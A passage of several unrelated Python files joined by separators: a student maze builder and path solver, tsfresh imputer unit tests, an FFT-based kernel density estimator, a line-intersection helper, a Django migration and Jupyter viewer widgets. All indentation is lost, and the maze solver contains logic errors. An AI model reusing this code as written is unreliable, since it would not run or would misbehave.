maze[self.x][self.y - 1].S = False
if direction == 'S':
if self.y >= size_y - 1:
raise ValueError('cannot remove side wall on south' + loc)
if self.S:
self.S = False
assert maze[self.x][self.y + 1].N
maze[self.x][self.y + 1].N = False
def has_wall(self, direction):
"""
True if there is a wall in the given direction
Direction is one of these strings: 'N', 'E', 'S', 'W'
"""
return getattr(self, direction.upper())
# Global variables for the maze and its size
size_x = size_y = 32
maze = [[Cell(x, y) for y in range(size_y)] for x in range(size_x)]
countsteps = 0 # Extra variable
def build_maze():
"""
Build a valid maze by tearing down walls
The function has access to the following global variables:
size_x - integer, the horizontal size of the maze
size_y - integer, the vertical size of the maze
maze - a two dimensional array (list of lists) for all cells
e.g. maze[3][4] is a Cell object for x=3, y=4
This function does not need to return any value but should modify the
cells (walls) to create a perfect maze.
When the function is invoked all cells have all their four walls standing.
Solution:
1. We pick a random cell
2. We select a random neighbouring cell ...
2b. ... that has not been visited
3. We remove the wall between the two cells and add the neighbouring cell to the list of cells having been visited.
4. If there are no unvisited neighbouring cell, we backtrack to one that has at least one unvisited neighbour;
this is done until we backtrack to the original cell.
"""
def buildwall(x, y):
maze[x][y].visited = True
d = [(x - 1, y), (x, y + 1), (x + 1, y), (x, y - 1)]
shuffle(d) # 2 Randomize neighbours
for (i, j) in d:
if (j < 0 or j > (size_y - 1) or
i < 0 or i > (size_x - 1) or
maze[i][j].visited == True):
# 3 (ignore visited)
continue
if i == x:
maze[x][max(y, j)].remove_wall('N') # 4 Remove the lower portion
elif j == y:
maze[min(x, i)][y].remove_wall('E') # 4 Remove the higher portion
# recursive call; push ahead
# 5; after recursion, effectively backtrack
buildwall(i, j)
buildwall(randrange(size_x - 1), randrange(size_y - 1)) # 1
def find_path(start, end):
"""
Find a path from the start position to the end
The start and end parameters are coordinate pairs (tuples) for the
start and end (target) position. E.g. (0, 0) or (7, 13).
The function has access to the following global variables:
size_x - integer, the horizontal size of the maze
size_y - integer, the vertical size of the maze
maze - a two dimensional array (list of lists) for all cells
e.g. maze[3][4] is a Cell object for x=3, y=4
The function is invoked after build_maze removed the walls to create a
perfect maze.
This function shall return a list of coordinate pairs (tuples or lists)
which list the cell coordinates on a valid path from start to end.
E.g.: [(0, 0), (0, 1), (1, 1), (2, 1), (3, 1), ..., (7, 13)]
"""
"""
1. The turtle has run into a wall. Since the square is occupied by a wall no further exploration can take place.
2. The turtle has found a square that has already been explored.
We do not want to continue exploring from this position or we will get into a loop.
3. We have found an outside edge, not occupied by a wall. In other words we have found an exit from the maze.
4. We have explored a square unsuccessfully in all four directions.
"""
"""Test #3"""
listRes = []
solve_path(listRes, start, end)
countsteps = len(listRes)
print("Number of steps", countsteps)
return listRes
def solve_path(listRes, start, end):
xx = start[0]
yy = start[1]
print(start)
if start in listRes:
return False
listRes.append(start)
if start == end:
print("Finish line reached at", start, "with these")
return True
else:
# Otherwise, use logical short circuiting to try each
# direction in turn (if needed)
for move in maze[xx][yy].coordinates:
if move == 'N' and not maze[xx][yy].has_wall('N'):
if solve_path(listRes, (xx, yy - 1), end):
return True
if move == 'E' and not maze[xx][yy].has_wall('E'):
if solve_path(listRes, (xx + 1, yy), end):
return True
if move == 'S' and not maze[xx][yy].has_wall('S'):
if solve_path(listRes, (xx, yy + 1), end):
return True
if move == 'W' and not maze[xx][yy].has_wall('W'):
if solve_path(listRes, (xx - 1, yy), end):
return True
listRes.pop() # Ensure to remove previous unnecessary movements
solve_path(listRes, listRes[-1], end)
"""Test #2"""
# xx = start[0]
# yy = start[1]
# listRes.append(start)
# if start == end:
# print("Found at ", start)
# return listRes
# else:
# if not (maze[xx][yy+1].visited or maze[xx][yy].has_wall('S')):
# yy += 1
# maze[xx][yy].visited = True
# return find_path((xx, yy), end)
# if not (maze[xx-1][yy].visited or maze[xx][yy].has_wall('W')):
# xx -= 1
# maze[xx][yy].visited = True
# return find_path((xx, yy), end)
# if not (maze[xx][yy-1].visited or maze[xx][yy].has_wall('N')):
# yy -= 1
# maze[xx][yy].visited = True
# return find_path((xx, yy), end)
# if not (maze[xx+1][yy].visited or maze[xx][yy].has_wall('E')):
# xx += 1
# maze[xx][yy].visited = True
# return find_path((xx, yy), end)
"""Solution from previous chapter"""
"""Test #1"""
# if maze[startRow][startColumn] == OBSTACLE :
# return False
# # 2. We have found a square that has already been explored
# if maze[startRow][startColumn] == TRIED:
# return False
# # 3. Success, an outside edge not occupied by an obstacle
# if maze.isExit(startRow,startColumn):
# maze.updatePosition(startRow, startColumn, PART_OF_PATH)
# return True
# maze.updatePosition(startRow, startColumn, TRIED)
#
# # Otherwise, use logical short circuiting to try each
# # direction in turn (if needed)
# found = searchFrom((xx-1, yy), end) or \
# searchFrom(xx+1, yy) or \
# searchFrom((xx,yy-1), end) or \
# searchFrom((xx,yy+1), end)
# found = find_path(maze, startRow-1, startColumn) or \
# find_path(maze, startRow+1, startColumn) or \
# find_path(maze, startRow, startColumn-1) or \
# find_path(maze, startRow, startColumn+1)
# if found:
# maze.updatePosition(startRow, startColumn, PART_OF_PATH)
# else:
# maze.updatePosition(startRow, startColumn, DEAD_END)
# return found
###############################################################################
# Testing and visualizing results - no need to understand and/or change
def main():
import sys
import Tkinter
sys.setrecursionlimit(4096)
start, end = (0, 0), (size_x - 1, size_y - 1)
build_maze()
path = find_path(start, end)
# checking maze
n_edges = 0
for x in range(size_x):
for y in range(size_y):
n_node_edges = 0
for direction in 'NESW':
n_node_edges += not maze[x][y].has_wall(direction)
if n_node_edges < 1:
print('WARNING: walled in cell @ (x=%d, y=%d)' % (x, y))
n_edges += n_node_edges
n_perfect_edges = (size_x * size_y - 1) * 2
if n_edges < n_perfect_edges:
print('WARNING: not a perfect maze, too many walls')
if n_edges > n_perfect_edges:
print('WARNING: not a perfect maze, redundant paths')
# checking path
try:
assert len(path) >= 2
if path[0] != start:
print('WARNING: invalid starting point for path', path[0])
if path[-1] != end:
print('WARNING: invalid endpoint for path', path[-1])
prev = None
for step in path:
assert 0 <= step[0] < size_x
assert 0 <= step[1] < size_y
if prev is not None:
dst = abs(step[0] - prev[0]) + abs(step[1] - prev[1])
if dst != 1:
print('WARNING: invalid step in path', prev, step)
prev = step
except Exception as e:
print('Ignoring invalid path object:', path, e)
path = None
cell_size = 20
master = Tkinter.Tk()
canvas = Tkinter.Canvas(master, width=size_x * cell_size + 1,
height=size_y * cell_size + 1,
bd=0, highlightthickness=0, relief='ridge')
canvas.pack()
for x in range(size_x):
for y in range(size_y):
if maze[x][y].N:
canvas.create_line(cell_size * x, cell_size * y,
cell_size * (x + 1), cell_size * y)
if maze[x][y].E:
canvas.create_line(cell_size * (x + 1), cell_size * y,
cell_size * (x + 1), cell_size * (y + 1))
if maze[x][y].S:
canvas.create_line(cell_size * x, cell_size * (y + 1),
cell_size * (x + 1), cell_size * (y + 1))
if maze[x][y].W:
canvas.create_line(cell_size * x, cell_size * y,
cell_size * x, cell_size * (y + 1))
if path:
line = [x * cell_size + cell_size // 2 for step in path for x in step]
canvas.create_line(*line, fill='red', width=2)
radius = cell_size // 3
img_start = [cell_size * x + cell_size // 2 for x in start]
canvas.create_oval(img_start[0] - radius,
img_start[1] - radius,
img_start[0] + radius,
img_start[1] + radius, fill='red')
img_end = [cell_size * x + cell_size // 2 for x in end]
canvas.create_oval(img_end[0] - radius,
img_end[1] - radius,
img_end[0] + radius,
img_end[1] + radius, fill='green')
master.title('Maze')
master.lift()
master.call('wm', 'attributes', '.', '-topmost', True)
Tkinter.mainloop()
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
# This file as well as the whole tsfresh package are licenced under the MIT licence (see the LICENCE.txt)
# Maximilian Christ (maximilianchrist.com), Blue Yonder Gmbh, 2016
import warnings
from builtins import range
from unittest import TestCase
import numpy as np
import numpy.testing as npt
import pandas as pd
import pandas.testing as pdt
from sklearn.exceptions import NotFittedError
from tsfresh.transformers.per_column_imputer import PerColumnImputer
class PerColumnImputerTestCase(TestCase):
def setUp(self):
np.random.seed(0)
def test_not_fitted(self):
imputer = PerColumnImputer()
X = pd.DataFrame()
self.assertRaises(NotFittedError, imputer.transform, X)
def test_only_nans_and_infs(self):
imputer = PerColumnImputer()
X = pd.DataFrame(index=list(range(100)))
X["NaNs"] = np.nan * np.ones(100)
X["PINF"] = np.PINF * np.ones(100)
X["NINF"] = np.NINF * np.ones(100)
with warnings.catch_warnings(record=True) as w:
imputer.fit(X)
self.assertEqual(len(w), 1)
self.assertEqual(
"The columns ['NaNs' 'PINF' 'NINF'] did not have any finite values. Filling with zeros.",
str(w[0].message),
)
selected_X = imputer.transform(X)
self.assertTrue((selected_X.values == 0).all())
def test_with_numpy_array(self):
imputer = PerColumnImputer()
X = pd.DataFrame(index=list(range(100)))
X["NaNs"] = np.nan * np.ones(100)
X["PINF"] = np.PINF * np.ones(100)
X["NINF"] = np.NINF * np.ones(100)
X_numpy = X.values.copy()
with warnings.catch_warnings(record=True) as w:
imputer.fit(X)
self.assertEqual(len(w), 1)
self.assertEqual(
"The columns ['NaNs' 'PINF' 'NINF'] did not have any finite values. Filling with zeros.",
str(w[0].message),
)
selected_X = imputer.transform(X)
# re-initialize for new dicts
imputer = PerColumnImputer()
with warnings.catch_warnings(record=True) as w:
imputer.fit(X_numpy)
self.assertEqual(len(w), 1)
self.assertEqual(
"The columns [0 1 2] did not have any finite values. Filling with zeros.",
str(w[0].message),
)
selected_X_numpy = imputer.transform(X_numpy)
npt.assert_array_equal(selected_X.values, selected_X_numpy.values)
self.assertTrue(selected_X_numpy.shape, (1, 100))
def test_standard_replacement_behavior(self):
imputer = PerColumnImputer()
data = [np.NINF, np.PINF, np.nan, 100.0, -100.0, 1.0, 1.0]
truth = [-100.0, 100.0, 1.0, 100.0, -100.0, 1.0, 1.0]
X = pd.DataFrame({"a": data})
true_X = pd.DataFrame({"a": truth})
imputer.fit(X)
selected_X = imputer.transform(X)
pdt.assert_frame_equal(selected_X, true_X)
def test_partial_preset_col_to_NINF_given(self):
data = [np.NINF, np.PINF, np.nan, 100.0, -100.0, 1.0, 1.0]
truth = [-100.0, 100.0, 1.0, 100.0, -100.0, 1.0, 1.0]
X = pd.DataFrame({"a": data})
true_X = pd.DataFrame({"a": truth})
col_to_min = {"a": -100}
imputer = PerColumnImputer(col_to_NINF_repl_preset=col_to_min)
imputer.fit(X)
selected_X = imputer.transform(X)
pdt.assert_frame_equal(selected_X, true_X)
def test_partial_preset_col_to_PINF_given(self):
data = [np.NINF, np.PINF, np.nan, 100.0, -100.0, 1.0, 1.0]
truth = [-100.0, 100.0, 1.0, 100.0, -100.0, 1.0, 1.0]
X = pd.DataFrame({"a": data})
true_X = pd.DataFrame({"a": truth})
col_to_max = {"a": 100}
imputer = PerColumnImputer(col_to_PINF_repl_preset=col_to_max)
imputer.fit(X)
selected_X = imputer.transform(X)
pdt.assert_frame_equal(selected_X, true_X)
def test_partial_preset_col_to_NAN_given(self):
data = [np.NINF, np.PINF, np.nan, 100.0, -100.0, 1.0, 1.0]
truth = [-100.0, 100.0, 1.0, 100.0, -100.0, 1.0, 1.0]
X = pd.DataFrame({"a": data})
true_X = pd.DataFrame({"a": truth})
col_to_median = {"a": 1}
imputer = PerColumnImputer(col_to_NAN_repl_preset=col_to_median)
imputer.fit(X)
selected_X = imputer.transform(X)
pdt.assert_frame_equal(selected_X, true_X)
def test_different_shapes_fitted_and_transformed(self):
imputer = PerColumnImputer()
X = pd.DataFrame(index=list(range(10)))
X["a"] = np.ones(10)
imputer.fit(X)
X["b"] = np.ones(10)
self.assertRaises(ValueError, imputer.transform, X)
def test_preset_has_higher_priority_than_fit(self):
data = [np.NINF, np.PINF, np.nan, 100.0, -100.0, 1.0, 1.0]
truth = [-100.0, 100.0, 0.0, 100.0, -100.0, 1.0, 1.0]
X = pd.DataFrame({"a": data})
true_X = pd.DataFrame({"a": truth})
col_to_median = {"a": 0}
imputer = PerColumnImputer(col_to_NAN_repl_preset=col_to_median)
imputer.fit(X)
selected_X = imputer.transform(X)
pdt.assert_frame_equal(selected_X, true_X)
def test_only_parameters_of_last_fit_count(self):
data = [np.NINF, np.PINF, np.nan, 100.0, -100.0, 1.0, 1.0]
data_2 = [np.NINF, np.PINF, np.nan, 10.0, -10.0, 3.0, 3.0]
truth_a = [-10.0, 10.0, 3.0, 10.0, -10.0, 3.0, 3.0]
truth_b = [-10.0, 10.0, 3.0, 10.0, -10.0, 3.0, 3.0]
X = pd.DataFrame({"a": data, "b": data})
X_2 = pd.DataFrame({"a": data_2, "b": data_2})
true_X = pd.DataFrame({"a": truth_a, "b": truth_b})
imputer = PerColumnImputer()
imputer.fit(X)
imputer.fit(X_2)
selected_X = imputer.transform(X_2)
pdt.assert_frame_equal(selected_X, true_X)
def test_only_subset_of_columns_given(self):
data = [np.NINF, np.PINF, np.nan, 100.0, -100.0, 1.0, 1.0]
truth_a = [-100.0, 100.0, 0.0, 100.0, -100.0, 1.0, 1.0]
truth_b = [-100.0, 100.0, 1.0, 100.0, -100.0, 1.0, 1.0]
X = pd.DataFrame({"a": data, "b": data})
true_X = pd.DataFrame({"a": truth_a, "b": truth_b})
col_to_median = {"a": 0}
imputer = PerColumnImputer(col_to_NAN_repl_preset=col_to_median)
imputer.fit(X)
selected_X = imputer.transform(X)
pdt.assert_frame_equal(selected_X, true_X)
def test_NINF_preset_contains_more_columns_than_dataframe_to_fit(self):
X = pd.DataFrame(index=list(range(10)))
X["a"] = np.ones(10)
col_to_min = {"a": 0, "b": 0}
imputer = PerColumnImputer(col_to_NINF_repl_preset=col_to_min)
self.assertRaises(ValueError, imputer.fit, X)
def test_PINF_preset_contains_more_columns_than_dataframe_to_fit(self):
X = pd.DataFrame(index=list(range(10)))
X["a"] = np.ones(10)
col_to_max = {"a": 0, "b": 0}
imputer = PerColumnImputer(col_to_PINF_repl_preset=col_to_max)
self.assertRaises(ValueError, imputer.fit, X)
def test_NAN_preset_contains_more_columns_than_dataframe_to_fit(self):
X = pd.DataFrame(index=list(range(10)))
X["a"] = np.ones(10)
col_to_median = {"a": 0, "b": 0}
imputer = PerColumnImputer(col_to_NAN_repl_preset=col_to_median)
self.assertRaises(ValueError, imputer.fit, X)
|
import numpy as np
from scipy.sparse import coo_matrix
from scipy.signal import convolve2d, convolve, gaussian
def fastkde(x, y, gridsize=(200, 200), extents=None, nocorrelation=False,
weights=None, adjust=1.):
"""
A fft-based Gaussian kernel density estimate (KDE)
for computing the KDE on a regular grid
Note that this is a different use case than scipy's original
scipy.stats.kde.gaussian_kde
IMPLEMENTATION
--------------
Performs a gaussian kernel density estimate over a regular grid using a
convolution of the gaussian kernel with a 2D histogram of the data.
It computes the sparse bi-dimensional histogram of two data samples where
*x*, and *y* are 1-D sequences of the same length. If *weights* is None
(default), this is a histogram of the number of occurences of the
observations at (x[i], y[i]).
histogram of the data is a faster implementation than numpy.histogram as it
avoids intermediate copies and excessive memory usage!
This function is typically *several orders of magnitude faster* than
scipy.stats.kde.gaussian_kde. For large (>1e7) numbers of points, it
produces an essentially identical result.
Boundary conditions on the data is corrected by using a symmetric /
reflection condition. Hence the limits of the dataset does not affect the
pdf estimate.
Parameters
----------
x, y: ndarray[ndim=1]
The x-coords, y-coords of the input data points respectively
gridsize: tuple
A (nx,ny) tuple of the size of the output grid (default: 200x200)
extents: (xmin, xmax, ymin, ymax) tuple
tuple of the extents of output grid (default: extent of input data)
nocorrelation: bool
If True, the correlation between the x and y coords will be ignored
when preforming the KDE. (default: False)
weights: ndarray[ndim=1]
An array of the same shape as x & y that weights each sample (x_i,
y_i) by each value in weights (w_i). Defaults to an array of ones
the same size as x & y. (default: None)
adjust : float
An adjustment factor for the bw. Bandwidth becomes bw * adjust.
Returns
-------
g: ndarray[ndim=2]
A gridded 2D kernel density estimate of the input points.
e: (xmin, xmax, ymin, ymax) tuple
Extents of g
"""
# Variable check
x, y = np.asarray(x), np.asarray(y)
x, y = np.squeeze(x), np.squeeze(y)
if x.size != y.size:
raise ValueError('Input x & y arrays must be the same size!')
n = x.size
if weights is None:
# Default: Weight all points equally
weights = np.ones(n)
else:
weights = np.squeeze(np.asarray(weights))
if weights.size != x.size:
raise ValueError('Input weights must be an array of the same size as input x & y arrays!')
# Optimize gridsize ------------------------------------------------------
# Make grid and discretize the data and round it to the next power of 2
# to optimize with the fft usage
if gridsize is None:
gridsize = np.asarray([np.max((len(x), 512.)), np.max((len(y), 512.))])
gridsize = 2 ** np.ceil(np.log2(gridsize)) # round to next power of 2
nx, ny = gridsize
# Make the sparse 2d-histogram -------------------------------------------
# Default extents are the extent of the data
if extents is None:
xmin, xmax = x.min(), x.max()
ymin, ymax = y.min(), y.max()
else:
xmin, xmax, ymin, ymax = map(float, extents)
dx = (xmax - xmin) / (nx - 1)
dy = (ymax - ymin) / (ny - 1)
# Basically, this is just doing what np.digitize does with one less copy
# xyi contains the bins of each point as a 2d array [(xi,yi)]
xyi = np.vstack((x, y)).T
xyi -= [xmin, ymin]
xyi /= [dx, dy]
xyi = np.floor(xyi, xyi).T
# Next, make a 2D histogram of x & y.
# Exploit a sparse coo_matrix avoiding np.histogram2d due to excessive
# memory usage with many points
grid = coo_matrix((weights, xyi), shape=(int(nx), int(ny))).toarray()
# Kernel Preliminary Calculations ---------------------------------------
# Calculate the covariance matrix (in pixel coords)
cov = np.cov(xyi)
if nocorrelation:
cov[1, 0] = 0
cov[0, 1] = 0
# Scaling factor for bandwidth
scotts_factor = n ** (-1.0 / 6.) * adjust # For 2D
# Make the gaussian kernel ---------------------------------------------
# First, determine the bandwidth using Scott's rule
# (note that Silvermann's rule gives the # same value for 2d datasets)
std_devs = np.sqrt(np.diag(cov))
kern_nx, kern_ny = np.round(scotts_factor * 2 * np.pi * std_devs)
# Determine the bandwidth to use for the gaussian kernel
inv_cov = np.linalg.inv(cov * scotts_factor ** 2)
# x & y (pixel) coords of the kernel grid, with <x,y> = <0,0> in center
xx = np.arange(kern_nx, dtype=np.float) - kern_nx / 2.0
yy = np.arange(kern_ny, dtype=np.float) - kern_ny / 2.0
xx, yy = np.meshgrid(xx, yy)
# Then evaluate the gaussian function on the kernel grid
kernel = np.vstack((xx.flatten(), yy.flatten()))
kernel = np.dot(inv_cov, kernel) * kernel
kernel = np.sum(kernel, axis=0) / 2.0
kernel = np.exp(-kernel)
kernel = kernel.reshape((int(kern_ny), int(kern_nx)))
# ---- Produce the kernel density estimate --------------------------------
# Convolve the histogram with the gaussian kernel
# use boundary=symm to correct for data boundaries in the kde
grid = convolve2d(grid, kernel, mode='same', boundary='symm')
# Normalization factor to divide result by so that units are in the same
# units as scipy.stats.kde.gaussian_kde's output.
norm_factor = 2 * np.pi * cov * scotts_factor ** 2
norm_factor = np.linalg.det(norm_factor)
norm_factor = n * dx * dy * np.sqrt(norm_factor)
# Normalize the result
grid /= norm_factor
return grid, (xmin, xmax, ymin, ymax)
def fastkde1D(xin, gridsize=200, extents=None, weights=None, adjust=1.):
"""
A fft-based Gaussian kernel density estimate (KDE)
for computing the KDE on a regular grid
Note that this is a different use case than scipy's original
scipy.stats.kde.gaussian_kde
IMPLEMENTATION
--------------
Performs a gaussian kernel density estimate over a regular grid using a
convolution of the gaussian kernel with a 2D histogram of the data.
It computes the sparse bi-dimensional histogram of two data samples where
*x*, and *y* are 1-D sequences of the same length. If *weights* is None
(default), this is a histogram of the number of occurences of the
observations at (x[i], y[i]).
histogram of the data is a faster implementation than numpy.histogram as it
avoids intermediate copies and excessive memory usage!
This function is typically *several orders of magnitude faster* than
scipy.stats.kde.gaussian_kde. For large (>1e7) numbers of points, it
produces an essentially identical result.
**Example usage and timing**
from scipy.stats import gaussian_kde
def npkde(x, xe):
kde = gaussian_kde(x)
r = kde.evaluate(xe)
return r
x = np.random.normal(0, 1, 1e6)
%timeit fastkde1D(x)
10 loops, best of 3: 31.9 ms per loop
%timeit npkde(x, xe)
1 loops, best of 3: 11.8 s per loop
~ 1e4 speed up!!! However gaussian_kde is not optimized for this
application
Boundary conditions on the data is corrected by using a symmetric /
reflection condition. Hence the limits of the dataset does not affect the
pdf estimate.
Parameters
----------
xin: ndarray[ndim=1]
The x-coords, y-coords of the input data points respectively
gridsize: int
A nx integer of the size of the output grid (default: 200x200)
extents: (xmin, xmax) tuple
tuple of the extents of output grid (default: extent of input data)
weights: ndarray[ndim=1]
An array of the same shape as x that weights each sample x_i
by w_i. Defaults to an array of ones the same size as x
(default: None)
adjust : float
An adjustment factor for the bw. Bandwidth becomes bw * adjust.
Returns
-------
g: ndarray[ndim=2]
A gridded 2D kernel density estimate of the input points.
e: (xmin, xmax, ymin, ymax) tuple
Extents of g
"""
# Variable check
x = np.squeeze(np.asarray(xin))
# Default extents are the extent of the data
if extents is None:
xmin, xmax = x.min(), x.max()
else:
xmin, xmax = map(float, extents)
x = x[(x <= xmax) & (x >= xmin)]
n = x.size
if weights is None:
# Default: Weight all points equally
weights = np.ones(n)
else:
weights = np.squeeze(np.asarray(weights))
if weights.size != x.size:
raise ValueError('Input weights must be an array of the same size as input x & y arrays!')
# Optimize gridsize ------------------------------------------------------
# Make grid and discretize the data and round it to the next power of 2
# to optimize with the fft usage
if gridsize is None:
gridsize = np.max((len(x), 512.))
gridsize = 2 ** np.ceil(np.log2(gridsize)) # round to next power of 2
nx = int(gridsize)
# Make the sparse 2d-histogram -------------------------------------------
dx = (xmax - xmin) / (nx - 1)
# Basically, this is just doing what np.digitize does with one less copy
# xyi contains the bins of each point as a 2d array [(xi,yi)]
xyi = x - xmin
xyi /= dx
xyi = np.floor(xyi, xyi)
xyi = np.vstack((xyi, np.zeros(n, dtype=int)))
# Next, make a 2D histogram of x & y.
# Exploit a sparse coo_matrix avoiding np.histogram2d due to excessive
# memory usage with many points
grid = coo_matrix((weights, xyi), shape=(int(nx), 1)).toarray()
# Kernel Preliminary Calculations ---------------------------------------
std_x = np.std(xyi[0])
# Scaling factor for bandwidth
scotts_factor = n ** (-1. / 5.) * adjust # For n ** (-1. / (d + 4))
# Silvermann n * (d + 2) / 4.)**(-1. / (d + 4)).
# Make the gaussian kernel ---------------------------------------------
# First, determine the bandwidth using Scott's rule
# (note that Silvermann's rule gives the # same value for 2d datasets)
kern_nx = int(np.round(scotts_factor * 2 * np.pi * std_x))
# Then evaluate the gaussian function on the kernel grid
kernel = np.reshape(gaussian(kern_nx, scotts_factor * std_x), (kern_nx, 1))
# ---- Produce the kernel density estimate --------------------------------
# Convolve the histogram with the gaussian kernel
# use symmetric padding to correct for data boundaries in the kde
npad = np.min((nx, 2 * kern_nx))
grid = np.vstack([grid[npad: 0: -1], grid, grid[nx: nx - npad: -1]])
grid = convolve(grid, kernel, mode='same')[npad: npad + nx]
# Normalization factor to divide result by so that units are in the same
# units as scipy.stats.kde.gaussian_kde's output.
norm_factor = 2 * np.pi * std_x * std_x * scotts_factor ** 2
norm_factor = n * dx * np.sqrt(norm_factor)
# Normalize the result
grid /= norm_factor
return np.squeeze(grid), (xmin, xmax)
|
def calcslope(A,B,C,D,E,F,G,H):
try:
s=(D-B)/(C-A)
s2=(H-F)/(G-E)
y1=B-(s*A)
y2=F-(s2*E)
x=(y2-y1)/(s-s2)
y3=s*x+y1
return("The point of intersection is ("+str(round(x,3))+", "+str(round(y3,3))+").")
except(ZeroDivisionError):
return("Error 001: Vertical or parallel lines detected.")
def convert(s,s2,y1,y2):
try:
x=(y2-y1)/(s-s2)
y3=s*x+y1
return("The point of intersection is ("+str(round(x,3))+", "+str(round(y3,3))+").")
except(ZeroDivisionError):
return("Error 002: Vertical or parallel lines detected.")
#convert(int(input("Enter coordinate pairs for two lines (0) or equations (1).\n")))
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.8 on 2016-09-14 13:48
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0025_auto_20160908_1035'),
]
operations = [
migrations.AlterField(
model_name='smtpsetting',
name='cou_group',
field=models.ManyToManyField(blank=True, to='core.CoUserGroup', verbose_name='Group Availability'),
),
]
|
import os
import numpy as np
import ipywidgets as widgets
import pandas as pd
import qgrid
from natsort import natsorted
from IPython.display import display
import plotly
import plotly.graph_objs as go
import mod_common_utils
def figures_in_path(my_path, figures=None, ext='.jpg'):
if figures is None:
figures = {}
for item in os.listdir(my_path):
file_path = os.path.join(my_path, item)
if (
os.path.isfile(file_path)
and os.path.splitext(item)[1] == ext
):
figure_id = tuple(os.path.splitext(item)[0].split('_'))
figures[figure_id] = file_path
return figures
class FiguresViewer:
def __init__(self, session):
self.session = session
self.figure_selection = []
if isinstance(self.session['paths'], (tuple, list)):
paths = self.session['paths']
else:
paths = [self.session['paths']]
self.figures = {}
for my_path in paths:
self.figures = figures_in_path(my_path, figures=self.figures)
keys_all = np.array(list(self.figures.keys()))
self.fs_max_all = sorted(set(keys_all[:, 0]))
self.norm_all = natsorted(set(keys_all[:, 1]))
self.fft_bin_size_all = sorted(set(keys_all[:, 2]))
self.psd_method_all = natsorted(set(keys_all[:, 3]))
self.normf_all = natsorted(set(keys_all[:, 4]))
self.norm_all = self.none_first(self.norm_all)
self.normf_all = self.none_first(self.normf_all)
self.panel_setup()
self.panel_refresh()
def none_first(self, my_sort):
if 'none' in my_sort:
my_sort.remove('none')
my_sort = ['none'] + my_sort
return my_sort
def panel_setup(self):
self.fs_max_select = widgets.RadioButtons(
options=self.fs_max_all,
value=self.fs_max_all[0],
description='Fs max'
)
self.norm_select = widgets.RadioButtons(
options=self.norm_all,
value=self.norm_all[0],
description='Norm time'
)
self.fft_bin_size_select = widgets.RadioButtons(
options=self.fft_bin_size_all,
value=self.fft_bin_size_all[0],
description='FFT bin size'
)
self.psd_method_select = widgets.RadioButtons(
options=self.psd_method_all,
value=self.psd_method_all[0],
description='PSD method'
)
self.normf_select = widgets.RadioButtons(
options=self.normf_all,
value=self.normf_all[0],
description='Norm freq'
)
self.panel_height_select = widgets.IntSlider(
min=100,
max=2000,
step=50,
value=800,
description='Panel height'
)
self.scale_select = widgets.IntSlider(
min=10,
max=100,
step=10,
value=100,
description='Fig size'
)
self.params_hbox = widgets.HBox([
self.fs_max_select,
self.norm_select,
self.fft_bin_size_select,
self.psd_method_select,
self.normf_select
])
self.params_images_hbox = widgets.HBox([
self.scale_select,self.panel_height_select
])
self.images_vbox = widgets.VBox()
display(widgets.VBox([
self.params_hbox,
self.params_images_hbox,
self.images_vbox
]))
self.fs_max_select.observe(self.panel_refresh, names='value')
self.norm_select.observe(self.panel_refresh, names='value')
self.fft_bin_size_select.observe(self.panel_refresh, names='value')
self.psd_method_select.observe(self.panel_refresh, names='value')
self.normf_select.observe(self.panel_refresh, names='value')
self.panel_height_select.observe(self.panel_refresh, names='value')
self.scale_select.observe(self.panel_refresh, names='value')
def panel_refresh(self, *pargs):
select_name = '_'.join([
self.fs_max_select.value,
self.norm_select.value,
self.fft_bin_size_select.value,
self.psd_method_select.value,
self.normf_select.value
])
figure_selection = natsorted([
self.figures[item] for item in self.figures
if select_name in self.figures[item]
])
image_width = int(1350*self.scale_select.value/100)
panel_height = self.panel_height_select.value
images = []
for figure_path in figure_selection:
with open(figure_path, 'rb') as f:
images += [widgets.Image(
value=f.read(),
layout={ 'width': str(image_width)+'px' }
)]
self.images_vbox.children=images
self.images_vbox.layout={
'height': str(panel_height)+'px',
}
def selections_labels_get(my_stats_m):
selections_ref = [
['fs_max', 0, sorted],
['norm', 1, natsorted],
['fft_bin_size', 2, sorted],
['psd_method', 3, natsorted],
['normf', 4, natsorted],
]
stats_tuples = np.array([key.split('_') for key in my_stats_m])
selections = {}
labels = {}
for key, idx, fn in selections_ref:
selections[key] = {
value: ['_'.join(key) for key in stats_tuples[stats_tuples[:, idx] == value]
]
for value in set(stats_tuples[:, idx])
}
my_sort = fn(set(stats_tuples[:, idx]))
if 'none' in my_sort:
my_sort.remove('none')
my_sort = ['none'] + my_sort
labels[key] = my_sort
return selections, labels
class TableViewer:
def __init__(self, stats_m):
self.stats_m = stats_m
self.selections, _ = selections_labels_get(self.stats_m)
self.psd_method_select = widgets.ToggleButtons(
options=[
('All', ''),
('Welch', 'welch'),
('Multitaper', 'multitaper')
],
value='',
description='PSD method',
)
self.grid = qgrid.show_grid(self.df_get(), precision=4)
display(widgets.VBox([self.psd_method_select, self.grid]))
self.psd_method_select.observe(self.grid_refresh, names='value')
def df_get(self):
my_value = self.psd_method_select.value
if my_value=='':
stats_list = list(self.stats_m)
else:
stats_list = self.selections['psd_method'][my_value]
stats_list = natsorted(stats_list)
df = pd.DataFrame({
'name': stats_list,
'calinski_harabasz': [
self.stats_m[item]['val_calinski_harabasz'] for item in stats_list
],
'davies_bouldin': [
self.stats_m[item]['val_davies_bouldin'] for item in stats_list
],
'silhouette': [
self.stats_m[item]['val_silhouette'] for item in stats_list
]
})
df.set_index('name', inplace=True)
return df
def grid_refresh(self, change):
self.grid.df = self.df_get()
def rgb_to_rgba(color, alpha=1):
return 'rgba'+color[3:-1]+', '+str(alpha)+')'
class MetricsViewer:
def __init__(self, stats_m, figures_folder=None):
self.stats_m = stats_m
self.figures_folder = figures_folder
self.selections, self.labels = selections_labels_get(self.stats_m)
self.colors_ref = plotly.colors.DEFAULT_PLOTLY_COLORS
self.my_metrics_ref = {
'silhouette': 'Silhouette coefficient (higher better)',
'val_silhouette': 'Silhouette coefficient (higher better) Validation',
'calinski_harabasz': 'Calinski Harabasz index (higher better)',
'val_calinski_harabasz': 'Calinski Harabasz index (higher better) Validation',
'davies_bouldin': 'Davies Bouldin index (lower better)',
'val_davies_bouldin': 'Davies Bouldin index (lower better) Validation'
}
self.my_metrics = [
'silhouette',
'val_silhouette',
'calinski_harabasz',
'val_calinski_harabasz',
'davies_bouldin',
'val_davies_bouldin'
]
self.my_metrics_multi = [
['calinski_harabasz', 'davies_bouldin'],
